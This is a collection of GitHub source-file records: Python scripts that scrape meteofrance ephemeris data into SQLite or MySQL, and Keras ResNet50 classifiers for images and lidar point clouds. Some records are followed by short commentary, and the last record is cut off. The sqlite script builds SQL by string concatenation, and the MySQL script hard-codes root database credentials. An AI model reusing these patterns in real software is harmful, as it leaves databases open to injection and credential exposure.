m.group(1)\n\nf.close()\n\nprint(\"SolLever: %s\" % SolLever)\nprint(\"SolCoucher: %s\" % SolCoucher)\nprint(\"LuneLever: %s\" % LuneLever)\nprint(\"LuneCoucher: %s\" % LuneCoucher)\nprint(\"Fete: %s\" % Fete)\n\n# Save data in the DB\ncon = None\ntry:\n conn = sqlite3.connect(path+'public/database/PiHomeConnect.sqlite')\n sql_command = \"INSERT INTO Ephemeride VALUES('\"+today+\"', '\"+Fete+\"', '\"+SolLever+\"', '\"+SolCoucher+\"', '\"+LuneLever+\"', '\"+LuneCoucher+\"');\"\n print(\"%s\" % (sql_command))\n conn.execute(sql_command)\n conn.commit()\n\nexcept sqlite3.Error, e:\n\n print \"Error %s:\" % e.args[0]\n sys.exit(1)\n\nfinally:\n\n if conn:\n conn.close()\n"
},
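The INSERT in `ephemeride-sqlite.py` is built by string concatenation, which breaks as soon as a scraped value contains a quote. Below is a minimal sketch of the same write using `sqlite3` placeholders; the table layout matches the script, while the sample values are assumptions standing in for the scraped fields.

```python
import sqlite3

# Stand-in values for the fields scraped above.
today, fete = "2015-01-10", "Guillaume"
sol_lever, sol_coucher = "08:43", "17:11"
lune_lever, lune_coucher = "21:39", "10:12"

conn = sqlite3.connect("public/database/PiHomeConnect.sqlite")
try:
    # Same six columns as the concatenated statement, but bound as parameters
    # so a quote inside a value cannot break (or inject into) the SQL.
    conn.execute(
        "INSERT INTO Ephemeride VALUES (?, ?, ?, ?, ?, ?)",
        (today, fete, sol_lever, sol_coucher, lune_lever, lune_coucher),
    )
    conn.commit()
finally:
    conn.close()
```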
{
"alpha_fraction": 0.6508849263191223,
"alphanum_fraction": 0.6557522416114807,
"avg_line_length": 32.79999923706055,
"blob_id": "32413f24e194d65090e47405fb76b7c157075906",
"content_id": "df3ec886b1fdcd002b827004a916bf83ba90309e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2260,
"license_type": "no_license",
"max_line_length": 325,
"num_lines": 65,
"path": "/ephemeride-mysql.py",
"repo_name": "deneth/Ephemeris",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\r\n# -*- coding: latin-1 -*-\r\n\r\nimport sqlite3\r\nimport re\r\nfrom time import sleep, localtime, strftime\r\nimport commands\r\nimport MySQLdb as mdb\r\n\r\npath = \"/home/pi/www/tmp/\"\r\n\r\n# Download meteofrance index.html and save it in /var/www/tmp\r\n# Delete previous file\r\ncommands.getstatusoutput('/bin/rm '+path+'index.html')\r\n# wget http://france.meteofrance.com/\r\ncommands.getstatusoutput('cd '+path+' && wget http://www.meteofrance.com/accueil')\r\n\r\nFete = \"x\"\r\nSolLever = \"x\"\r\nSolCoucher = \"x\"\r\nLuneLever = \"x\"\r\nLuneCoucher = \"x\"\r\n\r\ntoday = strftime(\"%Y-%m-%d\", localtime())\r\n# Open file to read data\r\nwith open(path+'index.html', 'r') as f:\r\n\tpage_source = f.read()\r\n\r\n\tm = re.search('<div class=\"mod-ephemeride-line mod-ephemeride-line-first\">.+<img src=\"/mf3-base-theme/images/contents/ephemeride-jour.png\" alt=\"Soleil\" />.+<span>Lever : <strong>(.+?)</strong></span>.+<span>Coucher : <strong>(.+?)</strong></span>.+</div>.+<div class=\"mod-ephemeride-line\">',page_source,re.DOTALL) \r\n\tif m:\r\n\t\tSolLever = m.group(1)\r\n\t\tSolCoucher = m.group(2)\r\n\tm = re.search('<div class=\"mod-ephemeride-line\">.+<img src=\"/mf3-base-theme/images/contents/ephemeride-nuit.png\" alt=\"Lune\" />.+<span>Lever : <strong>(.+?)</strong></span>.+<span>Coucher : <strong>(.+?)</strong></span>',page_source,re.MULTILINE|re.DOTALL) \r\n\tif m:\r\n\t\tLuneLever = m.group(1)\r\n\t\tLuneCoucher = m.group(2)\r\n\tm = re.search('<div class=\"mod-ephemeride\">.*<h2 class=\"capitalize\">.*</h2>.*<span class=\"mod-ephemeride-saint\">(.+?)</span><br>', page_source,re.MULTILINE|re.DOTALL)\r\n\tif m:\r\n\t\tFete = m.group(1)\r\n\r\nf.close()\r\n\r\nprint Fete\r\nprint SolLever\r\nprint SolCoucher\r\nprint LuneLever\r\nprint LuneCoucher\r\n\r\ncon = mdb.connect('localhost', 'root', 'raspberry', 'MonitoringPi');\r\ncur = con.cursor()\r\nwith con:\r\n\t\tquery = \"DELETE FROM Ephemerides WHERE date(date)=date(now())\";\r\n\t\tcur.execute(query);\r\n\t\t\r\n\t\tquery = ( \"INSERT INTO Ephemerides ( fete, sollever, solcoucher, lunelever, lunecoucher) \"\r\n\t\t\t\t\t\t\"VALUES (%(fete)s, %(sollever)s, %(solcoucher)s, %(lunelever)s, %(lunecoucher)s)\")\r\n\t\tdata = {\r\n\t\t\t'fete': Fete,\r\n\t\t\t'sollever': SolLever,\r\n\t\t\t'solcoucher': SolCoucher,\r\n\t\t\t'lunelever': LuneLever,\r\n\t\t\t'lunecoucher': LuneCoucher,\r\n\t\t}\r\n\t\t\r\n\t\tcur.execute(query, data)"
}
] | 2 |
zazgf/littlelearn | https://github.com/zazgf/littlelearn | 4c43a63432ca02738f1ebfbd8742881c499ee7b1 | bcfcb46b01d2f0065de0b43be46fbe7d444bb441 | 4260ff2f675ec0f6ab941f2e94c3734f698f0077 | refs/heads/main | 2023-01-30T22:40:59.410040 | 2020-12-14T02:36:09 | 2020-12-14T02:36:09 | 320,527,544 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6757557988166809,
"alphanum_fraction": 0.696502685546875,
"avg_line_length": 23.823530197143555,
"blob_id": "e4059228a1bbb2dfec55d4aa16540bfcab5ba1a7",
"content_id": "8711d9f3de9cd55da5504b933a6cd56bb4825ebf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1715,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 68,
"path": "/residual/mt_p.py",
"repo_name": "zazgf/littlelearn",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\nimport os\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array\nfrom keras.models import Sequential, load_model\nimport time\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nimport imageio\nimport tensorflow as tf\nimport keras.backend as K\nK.set_image_data_format('channels_last')\nK.set_learning_phase(1)\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\nK.set_session(session)\n\n\n\nmodel_path = './models/model.h5'\nmodel_weights_path = './models/weights.h5'\ntest_path = 'datasets/test'\n\nmodel = load_model(model_path)\nmodel.load_weights(model_weights_path)\n\nimg_width, img_height = 150, 150\n\ndef predict(file):\n x = load_img(file, target_size=(img_width,img_height))\n x = img_to_array(x)\n x = np.expand_dims(x, axis=0)\n with tf.device('/GPU:0'):\n array = model.predict(x)\n result = array[0]\n answer = np.argmax(result)\n if answer == 1:\n print(\"判断:石块较少\")\n elif answer == 0:\n print(\"判断:石块较多\")\n elif answer == 2:\n print(\"Predicted: ok\")\n\n return answer\n\nstart = time.time()\nfor i, ret in enumerate(os.walk(test_path)):\n for i, filename in enumerate(ret[2]):\n if filename.startswith(\".\"):\n continue\n \n print(ret[0] + '/' + filename)\n result = predict(ret[0] + '/' + filename)\n print(\" \")\n\nend = time.time()\ndur = end-start\n\nif dur<60:\n print(\"Execution Time:\",dur,\"seconds\")\nelif dur>60 and dur<3600:\n dur=dur/60\n print(\"Execution Time:\",dur,\"minutes\")\nelse:\n dur=dur/(60*60)\n print(\"Execution Time:\",dur,\"hours\")"
},
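`mt_p.py` hard-codes which argmax index means which class. When the model was trained with `flow_from_directory` (as in `mt.py` later in this repo), the index-to-folder mapping can be recovered from the generator instead. A sketch, assuming the `data/train` directory layout from the training script; the folder names shown in the comment are hypothetical.

```python
from keras.preprocessing.image import ImageDataGenerator

# Rebuild the generator only to read its class mapping; 'data/train' is the
# directory layout assumed from the training script (mt.py).
gen = ImageDataGenerator(rescale=1. / 255)
batches = gen.flow_from_directory('data/train', target_size=(150, 150),
                                  class_mode='categorical')

# class_indices maps folder name -> softmax index, e.g. {'many_rocks': 0, ...}
index_to_label = {v: k for k, v in batches.class_indices.items()}
print(index_to_label)
```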
{
"alpha_fraction": 0.6096458435058594,
"alphanum_fraction": 0.6623963713645935,
"avg_line_length": 52.61616134643555,
"blob_id": "cb4233df47857b7db3f3a6b28d71d98929d9f9ff",
"content_id": "5322432e8b0da2a7610b7fe47a76918aadc97fc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5308,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 99,
"path": "/residual/lidar_net.py",
"repo_name": "zazgf/littlelearn",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom keras import layers\nfrom keras.layers import Input, Add,Dense,Activation,ZeroPadding1D,BatchNormalization,Flatten,Conv2D,AveragePooling1D,MaxPooling1D,GlobalMaxPooling1D,Conv1D\nfrom keras.models import Model,load_model\nfrom keras.preprocessing import image\nfrom keras.utils import layer_utils\nfrom keras.utils.data_utils import get_file\nfrom keras.applications.imagenet_utils import preprocess_input\nimport pydot\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\nfrom keras.utils import plot_model\nfrom keras.initializers import glorot_uniform\nimport scipy.misc\nfrom matplotlib.pyplot import imshow\nfrom matplotlib import pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\nimport os\nfrom keras import callbacks\nimport time\nimport tensorflow as tf\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nimport imageio\nimport keras.backend as K\nimport math\nK.set_image_data_format('channels_last')\nK.set_learning_phase(1)\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\nK.set_session(session)\n\ndef identity_block(X, f, filters, stage, block):\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n F1, F2, F3 = filters\n X_shortcut = X\n X = Conv1D(filters = F1, kernel_size = 1, strides = 1, padding = 'valid', name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name = bn_name_base + '2a')(X)\n X = Activation('relu')(X)\n X = Conv1D(filters = F2, kernel_size=(f), strides = (1), padding='same', name = conv_name_base + '2b', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name = bn_name_base + '2b')(X)\n X = Activation('relu')(X)\n X = Conv1D(filters = F3, kernel_size=(1), strides = 1, padding=\"valid\", name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name=bn_name_base + '2c')(X)\n X = Add()([X,X_shortcut])\n X = Activation('relu')(X)\n return X\n\ndef convolutional_block(X, f, filters, stage, block, s = 2):\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n F1, F2, F3 = filters\n X_shortcut = X\n X = Conv1D(filters = F1, kernel_size= (1), strides = s,padding=\"valid\", name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name = bn_name_base + '2a')(X)\n X = Activation('relu')(X)\n X = Conv1D(filters = F2, kernel_size=(f), strides=(1), name = conv_name_base + '2b', padding=\"same\",kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name= bn_name_base + '2b')(X)\n X = Activation('relu')(X)\n X = Conv1D(filters = F3, kernel_size=(1), strides = (1), name= conv_name_base + '2c',padding=\"valid\", kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name=bn_name_base + '2c')(X)\n X_shortcut = Conv1D(filters = F3, kernel_size= (1), strides=(s), name=conv_name_base + '1', padding=\"valid\", kernel_initializer=glorot_uniform(seed=0))(X_shortcut)\n X_shortcut = BatchNormalization(axis=2, name=bn_name_base+'1')(X_shortcut)\n X = Add()([X_shortcut,X])\n X = Activation(\"relu\")(X)\n return X\ndef ResNet50(input_shape=(1024, 3), classes=2):\n X_input = 
Input(input_shape)\n X = ZeroPadding1D((3))(X_input)\n X = Conv1D(64, (7), strides=(2), name='conv1', kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(name='bn_conv1')(X)\n X = Activation('relu')(X)\n X = MaxPooling1D((4), strides= (4))(X)\n X = convolutional_block(X, f=3, filters=[64, 64, 256], stage=2, block='a', s=1)\n X = identity_block(X, 3, [64, 64, 256], stage=2, block='b')\n X = identity_block(X, 3, [64, 64, 256], stage=2, block='c')\n X = convolutional_block(X, f = 3, filters = [128, 128, 512], stage = 3, block='a', s = 2)\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='b')\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='c')\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='d')\n # X = AveragePooling1D((4), name='avg_pool0')(X)\n\n X = convolutional_block(X, f = 3, filters = [256, 256, 1024], stage = 4, block='a', s = 2)\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='b')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='c')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='d')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='e')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='f')\n X = convolutional_block(X, f = 3, filters = [512, 512, 2048], stage = 5, block='a', s = 2)\n X = identity_block(X, 3, [512, 512, 2048], stage=5, block='b')\n X = identity_block(X, 3, [512, 512, 2048], stage=5, block='c')\n X = AveragePooling1D((2), name=\"avg_pool\")(X)\n X = Flatten()(X)\n X = Dense(classes, activation='softmax', name='fc' + str(classes), kernel_initializer = glorot_uniform(seed=0))(X)\n model = Model(inputs = X_input, outputs = X, name='ResNet50')\n return model\n"
},
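A property worth checking in `identity_block` is that the `Add()` merge requires the block's input and output tensors to have identical shapes, which is why the last filter count `F3` must equal the input channel count. A quick sketch verifying this with a dummy tensor, assuming `lidar_net.py` above is importable from the working directory (note importing it also runs its module-level TF session setup):

```python
import numpy as np
from keras.layers import Input
from keras.models import Model
from lidar_net import identity_block  # the block defined above

# 256 timesteps x 256 channels; F3 (=256) must match the channel count,
# otherwise the Add() merge inside the block raises a shape error.
inp = Input(shape=(256, 256))
out = identity_block(inp, f=3, filters=[64, 64, 256], stage=9, block='x')
model = Model(inputs=inp, outputs=out)

x = np.random.rand(1, 256, 256)
print(model.predict(x).shape)  # (1, 256, 256): same shape in and out
```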
{
"alpha_fraction": 0.6755017042160034,
"alphanum_fraction": 0.6985990405082703,
"avg_line_length": 36.197181701660156,
"blob_id": "8e7740663c2fa0ae82c464f145179a185726063a",
"content_id": "86f0daca0edd6da736fb5ac5950a76b81d22c69a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2641,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 71,
"path": "/residual/util.py",
"repo_name": "zazgf/littlelearn",
"src_encoding": "UTF-8",
"text": "import open3d as o3d\nimport numpy as np\nimport os\nimport tensorflow as tf\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\nfrom keras.initializers import glorot_uniform\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras import layers\nfrom keras.layers import Input, Add,Dense,Activation,ZeroPadding2D,BatchNormalization,Flatten,Conv2D,AveragePooling2D,MaxPooling2D,GlobalMaxPooling2D\nfrom keras.models import Model,load_model\nfrom keras.preprocessing import image\nfrom keras.utils import layer_utils\nfrom keras.utils.data_utils import get_file\nfrom keras.applications.imagenet_utils import preprocess_input\nimport imageio\nimport keras.backend as K\nimport math\n# K.set_image_data_format('channels_last')\n# K.set_learning_phase(1)\n# config = ConfigProto()\n# config.gpu_options.allow_growth = True\n# session = InteractiveSession(config=config)\n# K.set_session(session)\nNUM_POINT = 1024\nnpoints = 3\nclasses = 2\nroot_path = \"lidar_data\"\ntrain_dir = os.path.join(root_path,'s1')\ntest_dir = os.path.join(root_path,'s2')\n\nT1=[]\nTE=[]\nfor i, ret in enumerate(os.walk(train_dir)):\n for i, filename in enumerate(ret[2]):\n if filename.startswith(\".\"):\n continue \n \n pcd = o3d.io.read_point_cloud(os.path.join(train_dir,filename))\n point_set = np.asarray(pcd.points)\n point_set = point_set[:NUM_POINT, 0:npoints]\n point_set = np.array([point_set])\n point_set = point_set[0]\n # np.reshape(point_set,[32,32,3])\n T1.append(point_set)\n TE.append([0,1])\nfor i, ret in enumerate(os.walk(test_dir)):\n for i, filename in enumerate(ret[2]):\n if filename.startswith(\".\"):\n continue \n pcd = o3d.io.read_point_cloud(os.path.join(test_dir,filename))\n point_set = np.asarray(pcd.points)\n point_set = point_set[:NUM_POINT, 0:npoints]\n point_set = np.array([point_set])\n point_set = point_set[0]\n # np.reshape(point_set,[32,32,3])\n print(point_set.shape)\n T1.append(point_set)\n TE.append([1,0])\nT1=np.asarray(T1)\nTE=np.asarray(TE)\nfrom sklearn.model_selection import train_test_split\nx_train,x_test,y_train,y_test=train_test_split(T1,TE,test_size=0.2,random_state=0)\nprint(x_train.shape)\nprint(y_train)\nfrom lidar_net import ResNet50,identity_block,convolutional_block\nif __name__ == '__main__':\n model = ResNet50(input_shape = (1024, 3), classes = classes)\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n model.summary()\n model.fit(x_train, y_train, epochs = 2, batch_size = 32)\n"
},
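`util.py` slices every cloud to `point_set[:NUM_POINT, ...]`, which silently yields ragged arrays whenever a `.pcd` file holds fewer than 1024 points. Below is a hedged pad-or-subsample helper; the repeat-padding policy is an assumption for illustration, not something the repo does.

```python
import numpy as np

NUM_POINT = 1024

def fix_num_points(points, n=NUM_POINT):
    """Return exactly n points: random subsample when there are too many,
    pad by repeating randomly chosen points when there are too few."""
    k = points.shape[0]
    if k >= n:
        idx = np.random.choice(k, n, replace=False)
    else:
        # Keep every original point, then repeat random ones up to n.
        idx = np.concatenate([np.arange(k),
                              np.random.choice(k, n - k, replace=True)])
    return points[idx]

cloud = np.random.rand(700, 3)      # stand-in for np.asarray(pcd.points)
print(fix_num_points(cloud).shape)  # (1024, 3)
```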
{
"alpha_fraction": 0.7727272510528564,
"alphanum_fraction": 0.7727272510528564,
"avg_line_length": 10,
"blob_id": "b2f99e330f3eb433be580ad30b5138dadb7f6eb6",
"content_id": "bc1f112df5176bb1ab2b25b9678737668146ded7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 2,
"path": "/README.md",
"repo_name": "zazgf/littlelearn",
"src_encoding": "UTF-8",
"text": "# littlelearn\nmy demo\n"
},
{
"alpha_fraction": 0.5956554412841797,
"alphanum_fraction": 0.6339391469955444,
"avg_line_length": 45.728641510009766,
"blob_id": "50606d170adb7e8d0a43341c82bb9f8ed33c2115",
"content_id": "4621ba414f2d695d79f96aab309ea89b227fcfde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9299,
"license_type": "no_license",
"max_line_length": 189,
"num_lines": 199,
"path": "/residual/mt.py",
"repo_name": "zazgf/littlelearn",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom keras import layers\nfrom keras.layers import Input, Add,Dense,Activation,ZeroPadding2D,BatchNormalization,Flatten,Conv2D,AveragePooling2D,MaxPooling2D,GlobalMaxPooling2D\nfrom keras.models import Model,load_model\nfrom keras.preprocessing import image\nfrom keras.utils import layer_utils\nfrom keras.utils.data_utils import get_file\nfrom keras.applications.imagenet_utils import preprocess_input\nimport pydot\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\nfrom keras.utils import plot_model\nfrom keras.initializers import glorot_uniform\nimport scipy.misc\nfrom matplotlib.pyplot import imshow\nfrom matplotlib import pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\nimport os\nfrom keras import callbacks\nimport time\nimport tensorflow as tf\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nimport imageio\nimport keras.backend as K\nimport math\nK.set_image_data_format('channels_last')\nK.set_learning_phase(1)\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\nK.set_session(session)\n\nmethod_2 = False\nmethod_3 = True\n\ntrain_data_path = 'data/train'\nvalidation_data_path = 'data/valid'\n\nimg_height = 150\nimg_width = 150\nclasses = 2\n\n\ndef identity_block(X, f, filters, stage, block):\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n F1, F2, F3 = filters\n X_shortcut = X\n X = Conv2D(filters = F1, kernel_size=(1,1) ,strides=(1,1),padding='valid',name=conv_name_base+'2a',kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=3,name=bn_name_base+'2a')(X)\n X = Activation('relu')(X)\n X = Conv2D(filters = F2,kernel_size=(f,f),strides=(1,1),padding='same',name = conv_name_base + '2b',kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=3,name = bn_name_base + '2b')(X)\n X = Activation('relu')(X)\n X = Conv2D(filters=F3,kernel_size=(1,1),strides=(1,1),padding='valid',name = conv_name_base+'2c',kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=3,name=bn_name_base+'2c')(X)\n X= Add()([X,X_shortcut])\n X = Activation('relu')(X)\n return X\ndef convolutional_block(X, f, filters, stage, block, s = 2):\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n F1, F2, F3 = filters\n X_shortcut = X\n X = Conv2D(F1, (1, 1), strides = (s,s), name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis = 3, name = bn_name_base + '2a')(X)\n X = Activation('relu')(X)\n X = Conv2D(filters = F2, kernel_size = (f, f), strides = (1,1), padding = 'same', name = conv_name_base + '2b', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis = 3, name = bn_name_base + '2b')(X)\n X = Activation('relu')(X)\n X = Conv2D(filters = F3, kernel_size = (1, 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis = 3, name = bn_name_base + '2c')(X)\n X_shortcut = Conv2D(filters = F3, kernel_size = (1, 1), strides = (s,s), padding = 'valid', name = conv_name_base + '1',\n kernel_initializer = glorot_uniform(seed=0))(X_shortcut)\n X_shortcut = BatchNormalization(axis = 3, name = bn_name_base + '1')(X_shortcut)\n X = 
Add()([X, X_shortcut])\n X = Activation('relu')(X)\n return X\ndef ResNet50(input_shape=(64, 64, 3), classes=6):\n X_input = Input(input_shape)\n X = ZeroPadding2D((3, 3))(X_input)\n X = Conv2D(64, (7, 7), strides=(2, 2), name='conv1', kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=3, name='bn_conv1')(X)\n X = Activation('relu')(X)\n X = MaxPooling2D((3, 3), strides=(2, 2))(X)\n X = convolutional_block(X, f=3, filters=[64, 64, 256], stage=2, block='a', s=1)\n X = identity_block(X, 3, [64, 64, 256], stage=2, block='b')\n X = identity_block(X, 3, [64, 64, 256], stage=2, block='c')\n X = convolutional_block(X, f = 3, filters = [128, 128, 512], stage = 3, block='a', s = 2)\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='b')\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='c')\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='d')\n X = convolutional_block(X, f = 3, filters = [256, 256, 1024], stage = 4, block='a', s = 2)\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='b')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='c')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='d')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='e')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='f')\n X = convolutional_block(X, f = 3, filters = [512, 512, 2048], stage = 5, block='a', s = 2)\n X = identity_block(X, 3, [512, 512, 2048], stage=5, block='b')\n X = identity_block(X, 3, [512, 512, 2048], stage=5, block='c')\n X = AveragePooling2D((2,2), name=\"avg_pool\")(X)\n X = Flatten()(X)\n X = Dense(classes, activation='softmax', name='fc' + str(classes), kernel_initializer = glorot_uniform(seed=0))(X)\n model = Model(inputs = X_input, outputs = X, name='ResNet50')\n return model\n\nif __name__ == '__main__':\n model = ResNet50(input_shape = (img_width, img_height, 3), classes = classes)\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n model.summary()\n\n if method_2:\n DATA_DIR = 'data'\n TRAIN_DIR = os.path.join(DATA_DIR, 'train')\n VALID_DIR = os.path.join(DATA_DIR, 'valid')\n SIZE = (64, 64)\n BATCH_SIZE = 6\n num_train_samples = sum([len(files) for r, d, files in os.walk(TRAIN_DIR)])\n num_valid_samples = sum([len(files) for r, d, files in os.walk(VALID_DIR)])\n\n num_train_steps = math.floor(num_train_samples/BATCH_SIZE)\n num_valid_steps = math.floor(num_valid_samples/BATCH_SIZE)\n\n gen = keras.preprocessing.image.ImageDataGenerator()\n val_gen = keras.preprocessing.image.ImageDataGenerator(horizontal_flip=True, vertical_flip=True)\n\n batches = gen.flow_from_directory(TRAIN_DIR, target_size=SIZE, class_mode='categorical', shuffle=True, batch_size=BATCH_SIZE)\n val_batches = val_gen.flow_from_directory(VALID_DIR, target_size=SIZE, class_mode='categorical', shuffle=True, batch_size=BATCH_SIZE)\n if method_3:\n batch_size = 4\n \n num_train_samples = sum([len(files) for r, d, files in os.walk(train_data_path)])\n num_valid_samples = sum([len(files) for r, d, files in os.walk(validation_data_path)])\n\n samples_per_epoch = math.floor(num_train_samples/batch_size)\n validation_steps = math.floor(num_valid_samples/batch_size)\n\n epochs = 2\n train_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n test_datagen = ImageDataGenerator(rescale=1. 
/ 255)\n\n train_generator = train_datagen.flow_from_directory(\n train_data_path,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical')\n\n validation_generator = test_datagen.flow_from_directory(\n validation_data_path,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical')\n\n if method_2:\n early_stopping = EarlyStopping(patience=10)\n checkpointer = ModelCheckpoint('resnet50_best.h5', verbose=1, save_best_only=True)\n log_dir = './tf-log/'\n tb_cb = callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0)\n cbks = [tb_cb]\n with tf.device('/GPU:0'):\n model.fit_generator(batches, steps_per_epoch=num_train_steps, epochs=20, callbacks=[early_stopping, checkpointer], validation_data=val_batches, validation_steps=num_valid_steps)\n plot_model(model, to_file='model.png')\n SVG(model_to_dot(model).create(prog='dot', format='svg'))\n model.save(\"myMode\")\n if method_3:\n log_dir = './tf-log/'\n tb_cb = callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0)\n cbks = [tb_cb]\n start = time.time()\n with tf.device('/GPU:0'):\n model.fit_generator(\n train_generator,\n steps_per_epoch=samples_per_epoch,\n epochs=epochs,\n callbacks=cbks,\n validation_data=validation_generator,\n validation_steps=validation_steps)\n target_dir = './models/'\n if not os.path.exists(target_dir):\n os.mkdir(target_dir)\n model.save('./models/model.h5')\n model.save_weights('./models/weights.h5')\n end = time.time()\n dur = end-start\n if dur<60:\n print(\"Execution Time:\",dur,\"seconds\")\n elif dur>60 and dur<3600:\n dur=dur/60\n print(\"Execution Time:\",dur,\"minutes\")\n else:\n dur=dur/(60*60)\n print(\"Execution Time:\",dur,\"hours\")\n"
}
] | 5 |
Ihmana/machine_ch4 | https://github.com/Ihmana/machine_ch4 | 9091e89a6b0a8b897654d2753155e000bede582d | 8e8ffed7db77fe6e601b6b0c3cb34f83ba7fc195 | 582e25b79ad95371d69dc346b24d4570efeb6525 | refs/heads/master | 2020-04-02T04:14:50.789132 | 2016-06-29T13:25:06 | 2016-06-29T13:25:06 | 62,227,689 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6871310472488403,
"alphanum_fraction": 0.7048406004905701,
"avg_line_length": 24.696969985961914,
"blob_id": "0d050ff728a376052a4635c86a80d118262aa0c3",
"content_id": "df4383de0d7f9de461a639a3fc867d2355eabd85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1055,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 33,
"path": "/word_cloud.py",
"repo_name": "Ihmana/machine_ch4",
"src_encoding": "UTF-8",
